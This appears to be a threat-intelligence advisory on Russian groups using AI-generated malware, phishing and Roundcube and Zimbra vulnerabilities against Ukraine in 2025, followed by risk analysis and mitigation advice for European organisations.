In the first half of 2025, Russian cyber threat actors have escalated their use of artificial intelligence (AI) to enhance the sophistication and scale of cyber attacks against Ukraine, as reported by Ukraine's State Service for Special Communications and Information Protection (SSSCIP). AI is leveraged not only to automate and personalize phishing campaigns but also to generate malware code, exemplified by the PowerShell-based WRECKSTEEL malware and other AI-assisted data stealers. The campaigns target a broad spectrum of Ukrainian entities including defense forces, government bodies, critical infrastructure, and innovation sectors. Notably, phishing attacks employ advanced tactics such as booby-trapped RAR archives and weaponized SVG files to deliver stealers like HOMESTEEL, GIFTEDCROOK, Amatera, and Strela Stealers. Additionally, the Sandworm group and APT28 exploit zero-day and known vulnerabilities in widely used webmail platforms Roundcube and Zimbra (e.g., CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, CVE-2025-27915) to conduct zero-click attacks that steal credentials, contact lists, and forward emails to attacker-controlled mailboxes. These attacks utilize stealth techniques such as hidden HTML input fields with autocomplete enabled to exfiltrate stored credentials. Furthermore, Russian threat actors increasingly abuse legitimate cloud and communication services (Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, and others) to host malicious payloads or exfiltrate data, complicating detection and attribution. This cyber campaign is integrated into a hybrid warfare strategy, synchronizing cyber operations with kinetic military actions. The threat landscape is fluid, with multiple Russian APT groups actively targeting sectors critical to national security and infrastructure resilience. The use of AI in malware development and phishing enhances attack automation, evasion, and effectiveness, signaling a shift in adversary capabilities that defenders must urgently address.

European organizations, particularly those in countries with close political, economic, or military ties to Ukraine or involved in defense, energy, and critical infrastructure sectors, face heightened risks from spillover or targeted attacks leveraging similar AI-enhanced tactics. The exploitation of widely deployed webmail platforms like Roundcube and Zimbra poses a direct threat to European entities using these services, potentially leading to credential theft, unauthorized email access, and data breaches. The abuse of legitimate cloud services for malware hosting and data exfiltration complicates detection and response efforts, increasing the risk of prolonged undetected intrusions. The integration of AI in malware generation and phishing campaigns may result in more convincing social engineering attacks, increasing the likelihood of successful compromises. Hybrid warfare tactics combining cyber and kinetic operations could destabilize critical infrastructure and disrupt essential services, with cascading effects across European supply chains and security frameworks. The evolving threat landscape demands heightened vigilance and adaptive defense strategies to mitigate potential operational, financial, and reputational damages.

European organizations should prioritize patching and updating webmail platforms such as Roundcube and Zimbra to remediate known vulnerabilities (e.g., CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, CVE-2025-27915) to prevent zero-click credential theft. Deploy advanced email security solutions capable of detecting AI-generated phishing content and weaponized file attachments, including booby-trapped archives and malicious SVG files. Implement strict monitoring and anomaly detection on cloud service usage to identify unusual hosting or data exfiltration activities leveraging legitimate platforms like Dropbox, Google Drive, and Telegram. Enhance endpoint detection and response (EDR) capabilities with AI-aware threat intelligence to identify novel AI-generated malware signatures and behaviors. Conduct targeted user awareness training focused on recognizing sophisticated AI-driven phishing attempts and social engineering tactics. Employ multi-factor authentication (MFA) across all critical systems to reduce the impact of credential compromise. Establish incident response playbooks that integrate hybrid warfare scenarios, ensuring coordination between cyber and physical security teams. Collaborate with national cybersecurity agencies and information sharing organizations to stay informed on emerging AI-enabled threats and indicators of compromise (IOCs).